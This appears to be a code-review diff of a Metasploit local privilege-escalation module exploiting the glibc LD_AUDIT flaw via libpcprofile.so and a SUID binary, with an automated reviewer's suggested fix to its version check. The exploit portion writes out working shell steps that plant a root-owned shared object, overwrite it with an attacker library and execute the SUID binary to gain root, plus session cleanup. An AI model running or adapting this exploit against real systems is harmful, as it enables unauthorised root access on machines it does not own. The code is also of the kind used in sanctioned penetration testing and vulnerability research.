@@ -34,10 +34,11 @@ def initialize(info = {})
34
34
LD_AUDIT resulting in arbitrary code execution.
35
35
36
36
This module has been tested successfully on glibc version 2.11.1 on
37
- Ubuntu 10.04 x86_64.
37
+ Ubuntu 10.04 x86_64 and version 2.7 on Debian 5.0.4 i386 .
38
38
39
- RHEL 5 and Debian 5 are reportedly affected, but untested. Some glibc
40
- distributions do not contain the vulnerable libpcprofile.so library.
39
+ RHEL 5 is reportedly affected, but untested. Some glibc distributions
40
+ do not contain the libpcprofile.so library required for successful
41
+ exploitation.
41
42
} ,
42
43
'License' => MSF_LICENSE ,
43
44
'Author' =>
@@ -95,7 +96,7 @@ def suid_exe_path
95
96
def check
96
97
glibc_banner = cmd_exec 'ldd --version'
97
98
glibc_version = Gem ::Version . new glibc_banner . scan ( /^ldd\s +\( .*\) \s +([\d \. ]+)/ ) . flatten . first
98
- if glibc_version . eql? ''
99
+ if glibc_version . to_s . eql? ''
99
100
vprint_error 'Could not determine the GNU C library version'
100
101
return CheckCode ::Safe
101
102
elsif glibc_version >= Gem ::Version . new ( '2.12.2' ) ||
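Review bot: The new `to_s.eql? ''` guard on line 99 still builds a `Gem::Version` from whatever `scan(...).flatten.first` returned, which is `nil` when the banner does not match; it works only because `Gem::Version.new(nil)` happens to stringify to an empty string, and current rubygems warns that nil versions are discouraged. Validating the scanned string before constructing the version object removes that dependency on rubygems internals and also copes with `cmd_exec` returning nil. `check` and its `if`/`elsif` chain continue past the end of the hunk.

```ruby
def check
  glibc_banner = cmd_exec 'ldd --version'
  version_str = glibc_banner.to_s.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first
  if version_str.nil? || version_str.empty?
    vprint_error 'Could not determine the GNU C library version'
    return CheckCode::Safe
  end
  glibc_version = Gem::Version.new(version_str)
  # … unchanged: version comparison chain …
```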
@@ -142,8 +143,8 @@ def upload_and_chmodx(path, data)
142
143
end
143
144
144
145
def on_new_session ( client )
145
- # remove root owned shared object
146
- if client . type == 'meterpreter'
146
+ # remove root owned shared object from system load path
147
+ if client . type . eql? 'meterpreter'
147
148
client . core . use 'stdapi' unless client . ext . aliases . include? 'stdapi'
148
149
client . fs . file . rm @so_path
149
150
else
@@ -226,7 +227,7 @@ def exploit
226
227
exp = %(
227
228
umask 0
228
229
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="#{ @so_path } " #{ suid_exe_path } 2>/dev/null
229
- umask 2
230
+ umask 0022
230
231
cat #{ so_path } > #{ @so_path }
231
232
LD_AUDIT="#{ so_name } .so" #{ suid_exe_path }
232
233
echo > #{ @so_path }
@@ -240,7 +241,9 @@ def exploit
240
241
241
242
# Launch exploit
242
243
print_status 'Launching exploit...'
243
- output = cmd_exec "#{ exp_path } &"
244
+ # The echo at the end of the command is required
245
+ # else the original session may die
246
+ output = cmd_exec "#{ exp_path } & echo "
244
247
output . each_line { |line | vprint_status line . chomp }
245
248
end
246
249
end